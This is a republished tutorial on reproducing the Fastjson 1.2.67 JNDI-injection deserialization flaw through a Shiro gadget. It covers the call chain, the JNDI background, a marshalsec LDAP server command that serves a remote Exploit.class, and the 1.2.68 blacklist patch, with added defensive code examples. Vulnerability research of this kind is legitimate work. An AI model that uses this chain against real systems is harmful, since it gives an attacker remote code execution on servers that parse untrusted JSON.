2025-03-02 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Today I will walk through how to set up an environment for the Fastjson vulnerability and reproduce it. Many people are not very familiar with it, so this article summarizes the steps and the underlying mechanism; I hope you gain something from it.
0x01 Fastjson Profile
Fastjson is Alibaba's open-source JSON parsing library. It can parse strings in JSON format, serialize JavaBeans to JSON strings, and deserialize JSON strings back into JavaBeans.
https://github.com/alibaba/fastjson
0x02 Environment setup
JDK version: 8u112
fastjson: 1.2.67
shiro: 1.5.1
slf4j-nop: 1.7.25
0x1 Add dependency package
To quickly add the jar packages the project needs, create a Maven project with the following
pom.xml
After that, right-click pom.xml and click Download source and document.
0x2 Select JDK version
This reproduction uses JDK 8u112.
0x3 Write vulnerability code
Add the vulnerable code under the main folder; the core of it is a call to fastjson's JSON.parseObject function on attacker-controlled input.
0x03 Vulnerability Principle
0x1 FastJson Class Analysis
The Fastjson interface is simple and easy to use, and it is widely used for cache serialization, protocol interaction, web output and Android clients. It provides two main entry points, toJSONString and parseObject, for serialization and deserialization respectively.
Both the parse and parseObject methods in FastJson deserialize a JSON string into a Java object, and parseObject is essentially a call to parse. However, parseObject additionally converts the resulting Java object into a JSONObject by calling JSON.toJSON. The difference during deserialization is therefore that parse only invokes the setter methods of the target class (and getters that meet certain conditions), while parseObject, because of the JSON.toJSON(obj) step, ends up invoking all setter and getter methods of the target class.
fastjson.java
As you can see from the results, calling the parseObject function invokes the getattr method.
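The behaviour described above, as an added example that is not code from the original article: a harmless bean whose accessors print when they run, so you can see that the typed parse step only touches setters while the toJSON step that parseObject appends invokes every public getter, including one with no matching setter (the position occupied by a gadget's getInstance()-style method in the real vulnerability). The class and method names here are my own; it assumes fastjson (the article's 1.2.67) on the classpath.

```java
import com.alibaba.fastjson.JSON;

// Added example, not from the original article. Compile and run with fastjson on the
// classpath, e.g.:
//   javac -cp fastjson-1.2.67.jar AccessorDemo.java
//   java  -cp fastjson-1.2.67.jar:. AccessorDemo
public class AccessorDemo {

    // A harmless bean whose accessors announce themselves when called (hypothetical class).
    public static class Bean {
        private String name;

        public Bean() {
        }

        public String getName() {
            System.out.println("getName() called");
            return name;
        }

        public void setName(String name) {
            System.out.println("setName() called");
            this.name = name;
        }

        // A getter with no matching setter: deserialization (parse) never needs it,
        // but serialization (toJSON) invokes every public getter, this one included.
        public String getAttr() {
            System.out.println("getAttr() called");
            return "attr";
        }
    }

    public static void main(String[] args) {
        // Constructed input: a plain document with no @type key.
        String json = "{\"name\":\"demo\"}";

        System.out.println("== parse into the target type: only setters run ==");
        Bean bean = JSON.parseObject(json, Bean.class);

        System.out.println("== toJSON on the resulting bean: every getter runs ==");
        Object tree = JSON.toJSON(bean);
        System.out.println(tree);

        // JSON.parseObject(String) is parse(String) followed by toJSON(result).
        // Without @type, parse returns a JSONObject (a Map), so the toJSON step has no
        // bean getters to invoke. When the document carries an @type naming a class that
        // autoType allows, parse builds that class and the toJSON step calls its getters,
        // which is the path the call-chain analysis below describes.
        System.out.println("== untyped parseObject on the same document ==");
        System.out.println(JSON.parseObject(json));
    }
}
```

The practical lesson for defenders is that any public getter on any class reachable through @type becomes callable by the sender of the JSON once the untyped parseObject path is used. Prefer the typed overload (parseObject(text, Target.class)) with autoType left disabled; on 1.2.68 and later, ParserConfig.getGlobalInstance().setSafeMode(true) turns @type handling off entirely and is the recommended setting whenever polymorphic deserialization is not required.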
0x2 vulnerability call chain analysis
Call stack analysis
1. parseObject object type conversion
This step converts the object that obj refers to into JSON format, which requires calling the object's getattr method, and that is what triggers the vulnerability.
2. reflection call
The getInstance method is called through reflection, via Method.invoke.
3. Trigger ldap
this.lookup(resourceName) is called inside JndiObjectFactory.getInstance.
0x3 JNDI injection
The Java Naming and Directory Interface (JNDI) is a Java API that works like an index hub: it lets clients discover and look up data and objects by name. JNDI covers both naming services and directory services and offers APIs for finding data and objects by name; the association of a name with an object is called a binding. JNDI can access existing directories and services such as JDBC, LDAP, RMI, DNS, NIS and CORBA.
A typical application scenario is loading database configuration dynamically, so that the database access code itself does not have to change.
Injection methods:
JNDI Reference with RMI
JNDI Reference with LDAP
RMI format: ctx.lookup("rmi://localhost:9999/refObj");
LDAP format: ctx.lookup("ldap://localhost:9999/refObj");
If the parameter passed to the lookup function is controllable by the attacker, it can be pointed at the attacker's server, and JNDI injection can then be used to achieve arbitrary code execution.
1 RMI
RMI (Remote Method Invocation): remote method invocation is a basic idea in distributed programming. CORBA and Web Services are language-independent technologies for remote method invocation; RMI is designed specifically for Java and relies on the JRMP communication protocol.
2 LDAP
LDAP (Lightweight Directory Access Protocol) is a directory service protocol that runs on top of the TCP/IP stack. A directory service is a specialized database that holds descriptive, attribute-based records, supports querying, browsing and searching, and organizes data in a tree structure. Because LDAP is organized as a tree, it cannot be queried with SQL statements the way a table can. It has strong "read" performance but poor "write" performance, and lacks complex features such as transactions and rollback, so it is not suitable for storing frequently modified data. The difference between an LDAP directory and an RMI registry is that the former is a directory service and allows attributes to be assigned to stored objects.
The vulnerability simply abuses the JNDI functionality in the org.apache.shiro package to reach an LDAP service set up by the tester, fetch the tester-compiled Exploit.class, and execute it.
0x04 Exploit
0x1 Compile Java Exploit Code
0x2 Start LDAP service
Start an LDAP server using marshalsec, which can be downloaded from
https://github.com/mbechler/marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8089/#Exploit
0x3 Open HTTP Web Services
Place the compiled Exploit.class in the web directory and start the HTTP service.
0x05 Vulnerability Patch
This repository maps the blacklist hashes shipped in each fastjson jar back to class names, which makes it easy to see which packages a given jar filters
https://github.com/LeadroyaL/fastjson-blacklist
The vulnerability was patched by blacklisting: org.apache.shiro.jndi is banned in 1.2.68.
The corresponding code is shown in the following figure. The handling is in the public Class checkAutoType(String typeName, Class expectClass, int features) function.
As for the blacklist hash generation algorithm, the idea is probably to XOR in each character and accumulate the result step by step.
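The hash used for the blacklist is the 64-bit FNV-1a hash (fastjson computes it in TypeUtils.fnv1a_64: XOR in the next character, then multiply by the FNV prime), and checkAutoType tests every prefix of the class name against the sorted hash table, so a single package entry covers every class below it. The following is an added example, not fastjson's own code: it reimplements that hash and the prefix check, with a deny list constructed from plain names (the package the article says 1.2.68 bans plus a made-up one); the real jar stores only the hash constants, which is why a lookup table such as fastjson-blacklist is needed to read them.

```java
import java.util.Arrays;

// Added example, not fastjson's own code: the 64-bit FNV-1a hash that fastjson's
// TypeUtils.fnv1a_64 computes, and a prefix check in the spirit of checkAutoType.
public class AutoTypeHashDemo {

    static final long BASIC = 0xcbf29ce484222325L; // FNV-1a 64-bit offset basis
    static final long PRIME = 0x100000001b3L;      // FNV-1a 64-bit prime

    // Hash of a whole string: XOR in each char, then multiply by the prime.
    static long fnv1a64(String s) {
        long h = BASIC;
        for (int i = 0; i < s.length(); i++) {
            h ^= s.charAt(i);
            h *= PRIME;
        }
        return h;
    }

    // Constructed deny list: the package named in the article's patch note plus a
    // hypothetical one. Stored sorted so the prefix check can use binary search,
    // as fastjson does with its hash arrays.
    static final long[] DENY_HASHES = sortedHashes("org.apache.shiro.jndi.", "com.example.forbidden.");

    static long[] sortedHashes(String... names) {
        long[] out = new long[names.length];
        for (int i = 0; i < names.length; i++) {
            out[i] = fnv1a64(names[i]);
        }
        Arrays.sort(out);
        return out;
    }

    // Prefix check: the running hash after each character is exactly the FNV-1a hash of
    // that prefix, so one pass over the class name tests every prefix against the list.
    // Inner-class separators are folded to '.', as checkAutoType does before hashing.
    static boolean isDenied(String typeName) {
        String className = typeName.replace('$', '.');
        long h = BASIC;
        for (int i = 0; i < className.length(); i++) {
            h ^= className.charAt(i);
            h *= PRIME;
            if (Arrays.binarySearch(DENY_HASHES, h) >= 0) {
                return true; // some prefix of the name is on the deny list
            }
        }
        return false;
    }

    public static void main(String[] args) {
        String[] samples = {
            "org.apache.shiro.jndi.JndiObjectFactory", // class named in the call-chain analysis
            "org.apache.shiro.realm.jndi.JndiRealmFactory", // same library, different package: not covered by that entry
            "java.util.HashMap"
        };
        for (String s : samples) {
            System.out.printf("%-50s hash=0x%016xL denied=%b%n", s, fnv1a64(s), isDenied(s));
        }
    }
}
```

Two points follow from the scheme. First, the deny list is a prefix list, so an entry ending in a dot blocks a whole package, while a class in a neighbouring package of the same library is untouched until it is listed separately; a hash blacklist is only ever as complete as the gadgets already known, which is why the accept-list and safeMode settings in ParserConfig are the stronger defence. Second, because the stored values are hashes, reviewing what a given fastjson version blocks means hashing candidate names yourself with this function (or using the fastjson-blacklist table) rather than reading names out of the jar.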
That concludes the walkthrough of setting up the Fastjson vulnerability environment and reproducing the vulnerability.